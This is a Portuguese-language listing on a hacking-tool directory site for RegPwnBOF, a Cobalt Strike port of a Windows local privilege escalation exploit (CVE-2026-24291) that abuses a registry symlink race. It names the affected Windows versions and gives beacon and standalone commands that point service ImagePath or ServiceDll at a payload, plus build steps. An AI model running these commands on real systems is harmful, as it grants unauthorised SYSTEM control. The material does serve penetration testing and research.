Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
RegPwnBOF — Bof do RegPwn por MDSec | Kitploit
Ferramentas/GitHubGitHub/flangvik/regpwnbof
Escalada de PrivilégiosExploraçãoPós-ExploraçãoTestes de PenetraçãoRed Teaming
GitHubflangvik/regpwnbof

RegPwnBOF

Bof do RegPwn por MDSec

Ver Repositório
127108há 6 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

RegPwn BOF

Porte BOF do Cobalt Strike do exploit RegPwn por Filip Dragovic (@Wh04m1001) / MDSec ActiveBreach.

Esta é uma reimplementação BOF desleixada do exploit original em C#. Todo o crédito pela pesquisa de vulnerabilidade e pelo exploit vai para Filip Dragovic e MDSec.

  • Post do blog: https://www.mdsec.co.uk/2026/03/rip-regpwn/
  • Repositório original: https://github.com/mdsecactivebreach/RegPwn
  • CVE: CVE-2026-24291

O que faz

Explora uma condição de corrida (race condition) de symlink do registro no mecanismo ATConfig do Windows Accessibility para escrever valores arbitrários em chaves de registro protegidas do HKLM a partir do contexto de um usuário normal (Escalada de Privilégio Local).

Tem como alvo Windows 11 25H2/24H2, Windows 10 21H2 e Windows Server 2016/2019/2022 anteriores ao patch de março de 2026.

AVISO: Este exploit bloqueia a estação de trabalho como parte da condição de corrida.

Alvo padrão

O serviço msiserver (Windows Installer) ImagePath. Este serviço é executado como SYSTEM e pode ser iniciado por usuários normais.

Uso

Cobalt Strike

Carregue regpwn.cna no Gerenciador de Scripts, então:

beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll

Teste autônomo

regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath

Após o exploit ser bem-sucedido, inicie o serviço para executar como SYSTEM:

net start msiserver

Compilar

Requer x86_64-w64-mingw32-gcc (compilador cruzado MinGW-w64).

make        # compilar BOF (regpwn.x64.o)
make test   # compilar EXE autônomo (regpwn.x64.exe)
make clean

Apenas x64.

Baixar ferramenta